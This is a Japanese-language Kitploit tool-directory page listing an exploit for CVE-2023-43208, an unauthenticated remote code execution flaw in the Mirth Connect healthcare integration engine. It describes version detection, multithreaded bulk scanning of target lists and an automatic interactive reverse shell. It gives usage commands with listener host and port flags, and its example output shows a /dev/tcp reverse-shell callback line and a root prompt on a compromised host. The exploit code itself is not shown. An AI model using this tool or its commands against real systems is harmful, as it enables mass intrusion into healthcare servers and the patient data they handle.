Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-43208 — Mirth ConnectのCVE-2023-43208におけるXMLデシリアライゼーションを介した認証なしRCEエクスプロイト。バージョン検出、バルクスキャン、対話型PTYシェルを備えています。 | Kitploit
ツール/GitHubGitHub/4nuxd/cve-2023-43208
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

Mirth ConnectのCVE-2023-43208におけるXMLデシリアライゼーションを介した認証なしRCEエクスプロイト。バージョン検出、バルクスキャン、対話型PTYシェルを備えています。

リポジトリを見る
1126ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-43208 — Mirth Connect RCE

Python CVE Platform

CVE-2023-43208 のProof-of-Conceptエクスプロイトです。これは、Mirth Connect のバージョン 4.4.1 未満における、認証不要のリモートコード実行(RCE)脆弱性です。


説明

Mirth Connectは広く使われているオープンソースのヘルスケア統合エンジンです。この脆弱性は、Apache Commons Collectionsのガジェットをチェーン化した細工されたXMLペイロードを使用して、/api/users エンドポイントを介したJavaデシリアライゼーションの欠陥を悪用し、認証なしでRCEを達成します。

強化版では、オリジナルの pwncat リスナーを、Pythonの組み込みモジュール(socket、select、tty、termios)のみを使用した完全な依存関係不要の対話型PTYシェルに置き換えています。接続時にシェルは自動的にフルPTYにアップグレードされます。


影響を受けるバージョン

ソフトウェア脆弱なバージョン修正バージョン
Mirth Connect< 4.4.14.4.1+

機能

  • Mirth Connectインスタンスの自動検出
  • バージョンフィンガープリンティングと脆弱性チェック
  • XMLデシリアライゼーションペイロードによる認証不要のRCE
  • 自動PTYシェルアップグレード(python3/python/script フォールバック)
  • 正しい端末サイズの伝搬(stty rows/cols)
  • マルチスレッド対応の一括スキャナー
  • 脆弱なターゲットをファイルに出力
  • pwncat 依存なし — リスナーは標準ライブラリのみ

インストール

git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

必要条件

requests
packaging
rich
alive-progress

使用方法

単一ターゲット — シェルを取得

python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

単一ターゲット — ngrok / バインドポートを使用

python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

ファイルから一括スキャン

python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

引数

フラグ説明
-u, --urlターゲットURL
-lh, --lhost自身のリスニングIP
-lp, --lport自身のリスニングポート
-bp, --bindportバインドポートの上書き(ngrok使用時に便利)
-f, --fileターゲットURLのリストを含むファイル
-o, --output脆弱なターゲットをファイルに保存
-t, --threadsスキャン時のスレッド数(デフォルト: 50)

出力例

[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

免責事項

このツールは許可されたペネトレーションテストおよび教育目的のみを意図しています。
あなたが所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法です。
著者は、このツールの誤用や損害について一切の責任を負いません。


クレジット

  • コード作成者: K3ysTr0K3R と Chocapikk
  • 強化者: 4nuxd
ツールをダウンロード